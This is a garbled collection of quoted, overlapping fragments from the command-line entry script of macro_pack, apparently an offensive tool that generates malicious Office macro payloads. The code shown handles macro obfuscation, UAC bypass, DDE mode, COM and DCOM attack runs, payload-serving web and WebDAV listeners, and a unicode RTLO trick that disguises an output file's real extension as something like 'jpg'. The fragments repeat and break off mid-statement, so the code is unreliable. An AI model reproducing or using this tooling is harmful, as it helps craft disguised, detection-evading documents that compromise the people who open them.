==", "sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings = True elif opt==\"-s\" or", "extension we want to spoof, such as \"jpg\" logging.info(\" [+]", "4 or mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\":", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else: if MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt, arg,", "os.system(\"cmd.exe /k \\\"%s\\\"\" % utils.getRunningApp()) # PyArmor Plugin: checkPlug() main(sys.argv[1:])", "opt in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames = True", "generator = ContainerGenerator(mpSession) generator.run() #run com attack if mpSession.runTarget: generator", "True elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif opt", "= os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort = int(arg)", "else: logging.info(\" [-] Input file path: %s\" % mpSession.fileInput) if", "from common.utils import MSTypes from common.definitions import VERSION, LOGLEVEL if", "= os.path.abspath(arg) elif opt == \"--run-visible\": if sys.platform == \"win32\":", "pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from pro_core import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\"", "mpSession.unicodeRtlo contains the extension we want to spoof, such as", "work on Windows too init() WORKING_DIR = \"temp\" BANNER =", "utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] ERROR: Invalid format for %s. 
Input", "opt==\"-t\" or opt==\"--template\": mpSession.template = arg elif opt == \"--listtemplates\":", "Termcolor work on Windows too init() WORKING_DIR = \"temp\" BANNER", "logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\" [+] Preparations...\") # check input", "== \"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER) else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "mpSession.template = arg elif opt == \"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0)", "os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could not find output folder %s.\" %", "interrupt caught!\") logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\")", "the extension we want to spoof, such as \"jpg\" logging.info(\"", "if mpSession.runTarget: generator = ComGenerator(mpSession) generator.run() if MP_TYPE == \"Pro\":", "None: import time time.sleep(0.4) # Needed to avoid some weird", "extension to spoof in reverse order fileName += '\\u200b' +", "sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255:", "if mpSession.fileInput is None: # Argument not supplied, try to", "working_directory) if not os.path.exists(working_directory): os.makedirs(working_directory) try: # Create temporary work", "elif opt in (\"-G\", \"--generate\"): mpSession.outputFilePath = os.path.abspath(arg) elif opt", "< 4 or mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif", "temporary folder logging.info(\" [-] Temporary working dir: %s\" % working_directory)", "sys import getopt import logging import shutil import psutil from", "from termcolor import colored # {PyArmor Protection Code} # {PyArmor", "colorama import init from termcolor import colored # {PyArmor Protection", "# Append extension to spoof in reverse order fileName +=", "piped logging.info(\" [-] Waiting for piped input feed...\") mpSession.stdinContent =", "race condition logging.info(\" [-] Store std input in file...\") f", "if MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER) else: help.printUsage(BANNER,", "mpSession.outputFilePath) # Retrieve the right payload builder if mpSession.outputFileType !=", "not find output folder %s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType", "if mpSession.Wlisten: Wlistener = WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(\" [!]", "utils, mp_session, help from common.utils import MSTypes from common.definitions import", "mpSession.runTarget: generator = ComGenerator(mpSession) generator.run() if MP_TYPE == \"Pro\": #run", "ContainerGenerator from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from pro_core import arg_mgt_pro, mp_session_pro", "# Append file extension fileName += fileExtension mpSession.outputFilePath = fileName", "on Windows too init() WORKING_DIR = \"temp\" BANNER = help.getToolPres()", "mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not", "session object working_directory = os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE == \"Pro\":", "= True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\":", "opt==\"-l\" or opt==\"--listen\": mpSession.listen = True mpSession.listenRoot = 
os.path.abspath(arg) elif", "not supplied, try to get file content from stdin if", "initialize macro_pack session object working_directory = os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE", "EOF #sys.stdin.close() if sys.platform == \"win32\": sys.stdin = open(\"conIN$\") else:", "not mpSession.htaMacro): inputFile = os.path.join(working_directory, \"command.cmd\") else: inputFile = os.path.join(working_directory,", "elif opt==\"--uac-bypass\": mpSession.uacBypass = True elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo", "Wlistener = WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(\" [!] Exception caught!\")", "\"INFO\": os.system('cls' if os.name == 'nt' else 'clear') # Logging", "logging.info(\" [-] Target output format: %s\" % mpSession.outputFileType) elif not", "utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run import DcomGenerator from pro_modules.payload_builders.containers import ContainerGenerator from", "if os.path.isfile(inputFile): logging.info(\" [-] Temporary input file: %s\" % inputFile)", "--listformats to view supported MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else:", "running_from = psutil.Process(os.getpid()).parent().parent().name() # if running_from == 'explorer.exe': # os.system(\"cmd.exe", "are not binary chars in input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)):", "True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset = arg except ValueError: help.printUsage(BANNER,", "opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif opt in (\"-G\",", "for opt, arg in opts: if opt in (\"-o\", \"--obfuscate\"):", "logging.error(\" [!] ERROR: Could not find %s!\" % mpSession.fileInput) sys.exit(2)", "sys.exit(2) if not mpSession.isTrojanMode: # verify that output file does", "fileName += fileExtension mpSession.outputFilePath = fileName logging.info(\" [-] File name", "= os.path.abspath(arg) elif opt==\"-t\" or opt==\"--template\": mpSession.template = arg elif", "= True elif opt==\"--uac-bypass\": mpSession.uacBypass = True elif opt ==", "file. 
if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA]", "'w') f.writelines(mpSession.stdinContent) f.close() else: # Create temporary work file if", "fileExtension mpSession.outputFilePath = fileName logging.info(\" [-] File name modified to:", "== \"--run-visible\": if sys.platform == \"win32\": mpSession.runVisible = True elif", "colored # {PyArmor Protection Code} # {PyArmor Plugins} # use", "macro_pack session object working_directory = os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE ==", "MP_TYPE=\"Community\" from colorama import init from termcolor import colored #", "opt==\"-p\" or opt==\"--print\": mpSession.printFile = True elif opt == \"--dde\":", "import shutil import psutil from modules.com_run import ComGenerator from modules.web_server", "os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\" [-] Target output format: %s\" %", "Append unicode RTLO to file name fileName += '\\u202e' #", "condition logging.info(\" [-] Store std input in file...\") f =", "if sys.platform == \"win32\": mpSession.ddeMode = True elif opt ==", "import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from colorama import init from", "generator.run() if MP_TYPE == \"Pro\": #run dcom attack if mpSession.dcom:", "longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions # Only enabled on windows if", "sys.platform == \"win32\": mpSession.runVisible = True elif opt == \"--force-yes\":", "elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True", "mpSession.WRoot = os.path.abspath(arg) elif opt == \"-f\" or opt== \"--input-file\":", "features not applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check output file", "in file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: #", "\"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\", \"help\"] shortOptions=", "if sys.platform == \"win32\": mpSession.runVisible = True elif opt ==", "mpSession.isTrojanMode: # verify that output file does not already exist", "ERROR: Invalid format for %s. 
Input should be text format", "= True elif opt == \"--force-yes\": mpSession.forceYes = True elif", "+= '\\u202e' # Append extension to spoof in reverse order", "MP_TYPE) else: mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions =", "logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if", "mpSession.icon = arg elif opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten = True", "else 'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\"", "fileName += '\\u202e' # Append extension to spoof in reverse", "reverse order fileName += '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible", "format: %s\" % mpSession.outputFileType) elif not mpSession.listen and not mpSession.Wlisten", "elif opt==\"-t\" or opt==\"--template\": mpSession.template = arg elif opt ==", "sys.exit(2) for opt, arg in opts: if opt in (\"-o\",", "if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could not find output folder", "= sys.stdin.readlines() # Close Stdin pipe, so we can call", "== 'explorer.exe': # os.system(\"cmd.exe /k \\\"%s\\\"\" % utils.getRunningApp()) # PyArmor", "extension fileName += fileExtension mpSession.outputFilePath = fileName logging.info(\" [-] File", "mpSession.unicodeRtlo = arg elif opt in (\"-G\", \"--generate\"): mpSession.outputFilePath =", "+ \".vba\" if mpSession.stdinContent is not None: import time time.sleep(0.4)", "if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255: help.printUsage(BANNER, sys.argv[0])", "is not None: import time time.sleep(0.4) # Needed to avoid", "255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg)", "if something is being piped logging.info(\" [-] Waiting for piped", "[-] Target output format: %s\" % mpSession.outputFileType) elif not mpSession.listen", "mpSession.uacBypass = True elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg", "psutil from modules.com_run import ComGenerator from modules.web_server import ListenServer from", "Exception caught!\") except KeyboardInterrupt: logging.error(\" [!] Keyboard interrupt caught!\") logging.info(\"", "help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt, arg in opts: if opt", "to spoof extension if unicodeRtlo option is enabled if mpSession.unicodeRtlo:", "getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt, arg in opts: if", "not None: # Check there are not binary chars in", "# only for Pro release if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions)", "output file does not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!]", "[!] 
ERROR: Output file %s already exist!\" % mpSession.outputFilePath) sys.exit(2)", "ERROR: Output file %s already exist!\" % mpSession.outputFilePath) sys.exit(2) #Create", "so filename does not end with flagged extension # Append", "mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else: mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE) try:", "mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else: mpSession = mp_session.MpSession(working_directory, VERSION,", "# Check there are not binary chars in input fil", "Windows too init() WORKING_DIR = \"temp\" BANNER = help.getToolPres() def", "opt == \"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"-q\" or opt==\"--quiet\":", "invisible space so filename does not end with flagged extension", "\"Pro\": #run dcom attack if mpSession.dcom: generator = DcomGenerator(mpSession) generator.run()", "if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions # Only", "PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload if payloadBuilder", "import utils, mp_session, help from common.utils import MSTypes from common.definitions", "Output file %s already exist!\" % mpSession.outputFilePath) sys.exit(2) #Create temporary", "unicodeRtlo option is enabled if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains", "file if mpSession.fileInput is not None: # Check there are", "MP_TYPE == \"Pro\": #run dcom attack if mpSession.dcom: generator =", "sys.platform == \"win32\": longOptions.extend([\"run=\", \"run-visible\"]) opts, args = getopt.getopt(argv, shortOptions,", "win32com.client #@UnresolvedImport @UnusedImport except: print(\"Error: Could not find win32com.\") sys.exit(1)", "can call input() later without triggering EOF #sys.stdin.close() if sys.platform", "mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE != \"Pro\" or", "+= fileExtension mpSession.outputFilePath = fileName logging.info(\" [-] File name modified", "opt, arg in opts: if opt in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm", "VBA script.\" % mpSession.fileInput) logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory)", "\"--run\": if sys.platform == \"win32\": mpSession.runTarget = os.path.abspath(arg) elif opt", "contains the extension we want to spoof, such as \"jpg\"", "Edit outputfile name to spoof extension if unicodeRtlo option is", "\"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\",", "for %s. Input should be text format containing your VBA", "file path: %s\" % mpSession.fileInput) if MP_TYPE == \"Pro\": if", "True elif opt == \"--run\": if sys.platform == \"win32\": mpSession.runTarget", "Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\" [+] Preparations...\") #", "except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt, arg in opts:", "= True mpSession.WRoot = os.path.abspath(arg) elif opt == \"-f\" or", "[!] %s is not a supported extension. 
Use --listformats to", "Waiting for piped input feed...\") mpSession.stdinContent = sys.stdin.readlines() # Close", "order fileName += '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible space", "inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + \".vba\" if mpSession.stdinContent is not", "from modules.Wlisten_server import WListenServer from modules.payload_builder_factory import PayloadBuilderFactory from common", "shutil import psutil from modules.com_run import ComGenerator from modules.web_server import", "import colored # {PyArmor Protection Code} # {PyArmor Plugins} #", "\"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\", \"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\"", "Temporary working dir: %s\" % working_directory) if not os.path.exists(working_directory): os.makedirs(working_directory)", "(mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro): inputFile = os.path.join(working_directory,", "or opt== \"--input-file\": mpSession.fileInput = arg elif opt == \"-e\"", "% os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\" [-] Target output format: %s\"", "[-] Temporary input file: %s\" % inputFile) # Edit outputfile", "attack if mpSession.dcom: generator = DcomGenerator(mpSession) generator.run() # Activate Web", "== \"Pro\" and not mpSession.communityMode: payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder", "= True mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm = True", "opt == \"--dde\": if sys.platform == \"win32\": mpSession.ddeMode = True", "option is enabled if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains the", "fileName += '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible space so", "generator.run() # Activate Web server if mpSession.listen: listener = ListenServer(mpSession)", "sys.platform == \"win32\": try: import win32com.client #@UnresolvedImport @UnusedImport except: print(\"Error:", "opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "not find %s!\" % mpSession.fileInput) sys.exit(2) else: logging.info(\" [-] Input", "\"generate=\", \"quiet\", \"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\",", "(pro features not applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check output", "-h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode: # verify that", "use Colorama to make Termcolor work on Windows too init()", "to view supported MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\"", "os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if __name__ == '__main__': #", "\"--generate\"): mpSession.outputFilePath = os.path.abspath(arg) elif opt == \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0)", "%s\" % mpSession.outputFilePath) # Retrieve the right payload builder if", "arg elif opt == \"-e\" or opt== \"--embed\": mpSession.embeddedFilePath =", "\"win32\": mpSession.ddeMode = True elif opt == \"--run\": if sys.platform", "%s.\" % 
os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType == MSTypes.UNKNOWN: logging.error(\" [!]", "using %s -h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode: #", "\"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\",", "in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames = True mpSession.obfuscateStrings", "\"webdav-listen=\", \"generate=\", \"quiet\", \"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\",", "does not end with flagged extension # Append file extension", "common import utils, mp_session, help from common.utils import MSTypes from", "\"e:l:w:s:f:t:G:hqmop\" # only for Pro release if MP_TYPE == \"Pro\":", "else: payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload if payloadBuilder is", "@UnusedVariable except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt, arg in", "logging.info(\" Done!\\n\") sys.exit(0) if __name__ == '__main__': # check if", "if MP_TYPE == \"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else:", "if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains the extension we want", "\"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\",", "find output folder %s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType ==", "exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output file %s already", "# Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\" [+] Preparations...\")", "[+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if __name__", "not os.path.isfile(mpSession.fileInput): logging.error(\" [!] 
ERROR: Could not find %s!\" %", "from explorer, if yes restart from cmd line # running_from", "generator.run() #run com attack if mpSession.runTarget: generator = ComGenerator(mpSession) generator.run()", "extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension %s \"", "arg_mgt_pro.verify(mpSession) # Check output file format if mpSession.outputFilePath: if not", "for Pro release if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions +=", "\"temp\" BANNER = help.getToolPres() def main(argv): global MP_TYPE logLevel =", "# Activate Web server if mpSession.listen: listener = ListenServer(mpSession) listener.run()", "logLevel = LOGLEVEL # initialize macro_pack session object working_directory =", "# Close Stdin pipe, so we can call input() later", "should be text format containing your VBA script.\" % mpSession.fileInput)", "input file: %s\" % inputFile) # Edit outputfile name to", "else: inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + \".vba\" if mpSession.stdinContent is", "= True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset = arg except ValueError:", "from pro_core import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from colorama import", "not os.path.exists(working_directory): os.makedirs(working_directory) try: # Create temporary work file. if", "space so filename does not end with flagged extension #", "if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output file %s already exist!\"", "containing your VBA script.\" % mpSession.fileInput) logging.info(\" [+] Cleaning...\") if", "import VERSION, LOGLEVEL if sys.platform == \"win32\": try: import win32com.client", "\"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\" # only for Pro release if MP_TYPE", "= open(\"conIN$\") else: sys.stdin = sys.__stdin__ else: if not os.path.isfile(mpSession.fileInput):", "\"run-visible\"]) opts, args = getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable except", "main(argv): global MP_TYPE logLevel = LOGLEVEL # initialize macro_pack session", "PayloadBuilderFactoryPro from pro_core import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from colorama", "opt==\"--start-function\": mpSession.startFunction = arg elif opt==\"-l\" or opt==\"--listen\": mpSession.listen =", "= mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions = [\"embed=\", \"listen=\", \"port=\",", "opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True elif", "logging.info(\" [+] Preparations...\") # check input args if mpSession.fileInput is", "args if mpSession.fileInput is None: # Argument not supplied, try", "= True elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif", "Create temporary work file if mpSession.fileInput is not None: #", "be text format containing your VBA script.\" % mpSession.fileInput) logging.info(\"", "try to get file content from stdin if not os.isatty(0):", "mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\":", "[!] Could not find output folder %s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2)", "%s \" % fileExtension) # Append unicode RTLO to file", "logging.exception(\" [!] Exception caught!\") except KeyboardInterrupt: logging.error(\" [!] 
Keyboard interrupt", "# Retrieve the right payload builder if mpSession.outputFileType != MSTypes.UNKNOWN:", "[+] Inject %s false extension with unicode RTLO\" % mpSession.unicodeRtlo)", "MP_TYPE) try: longOptions = [\"embed=\", \"listen=\", \"port=\", \"webdav-listen=\", \"generate=\", \"quiet\",", "line # running_from = psutil.Process(os.getpid()).parent().parent().name() # if running_from == 'explorer.exe':", "os.path.abspath(arg) elif opt == \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\" or", "sys.exit(0) elif opt==\"-h\" or opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else: if", "from modules.payload_builder_factory import PayloadBuilderFactory from common import utils, mp_session, help", "\".vba\" if mpSession.stdinContent is not None: import time time.sleep(0.4) #", "Protection Code} # {PyArmor Plugins} # use Colorama to make", "\"Pro\": if mpSession.communityMode: logging.warning(\" [!] Running in community mode (pro", "= PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload if payloadBuilder is not None:", "\"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\",", "in reverse order fileName += '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend", "\"win32\": sys.stdin = open(\"conIN$\") else: sys.stdin = sys.__stdin__ else: if", "builder if mpSession.outputFileType != MSTypes.UNKNOWN: if MP_TYPE == \"Pro\" and", "folder logging.info(\" [-] Temporary working dir: %s\" % working_directory) if", "== \"--dde\": if sys.platform == \"win32\": mpSession.ddeMode = True elif", "# verify that output file does not already exist if", "is not None: payloadBuilder.run() if MP_TYPE == \"Pro\": generator =", "elif opt==\"-s\" or opt==\"--start-function\": mpSession.startFunction = arg elif opt==\"-l\" or", "open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: # Create temporary work file", "sys.stdin = open(\"conIN$\") else: sys.stdin = sys.__stdin__ else: if not", "input file...\") shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile): logging.info(\" [-] Temporary input", "os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort = int(arg) elif", "DcomGenerator from pro_modules.payload_builders.containers import ContainerGenerator from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from", "or mpSession.dcomTarget is None): logging.error(\" [!] 
You need to provide", "os.path.isfile(inputFile): logging.info(\" [-] Temporary input file: %s\" % inputFile) #", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg) except", "sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen > 255:", "None: # Check there are not binary chars in input", "%s false extension with unicode RTLO\" % mpSession.unicodeRtlo) # Separate", "None: payloadBuilder.run() if MP_TYPE == \"Pro\": generator = ContainerGenerator(mpSession) generator.run()", "if sys.platform == \"win32\": mpSession.runTarget = os.path.abspath(arg) elif opt ==", "opt==\"--obfuscate-form\": mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif", "== \"Pro\": #run dcom attack if mpSession.dcom: generator = DcomGenerator(mpSession)", "WListenServer from modules.payload_builder_factory import PayloadBuilderFactory from common import utils, mp_session,", "from stdin if not os.isatty(0): # check if something is", "= mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else: mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE)", "mpSession.runVisible = True elif opt == \"--force-yes\": mpSession.forceYes = True", "logging.info(\" [+] Inject %s false extension with unicode RTLO\" %", "try: mpSession.obfuscatedNamesMinLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if", "Check output file format if mpSession.outputFilePath: if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\"", "release if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions #", "+= '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible space so filename", "= ListenServer(mpSession) listener.run() # Activate WebDav server if mpSession.Wlisten: Wlistener", "already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output file %s", "not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could not find output folder %s.\"", "'__main__': # check if running from explorer, if yes restart", "shortOptions, longOptions) # @UnusedVariable except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for", "work file. if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in", "mpSession.fileInput) sys.exit(2) else: logging.info(\" [-] Input file path: %s\" %", "= True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares", "== MSTypes.UNKNOWN: logging.error(\" [!] %s is not a supported extension.", "not os.isatty(0): # check if something is being piped logging.info(\"", "import getopt import logging import shutil import psutil from modules.com_run", "not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output file", "logging.info(\" [-] Input file path: %s\" % mpSession.fileInput) if MP_TYPE", "os.makedirs(working_directory) try: # Create temporary work file. 
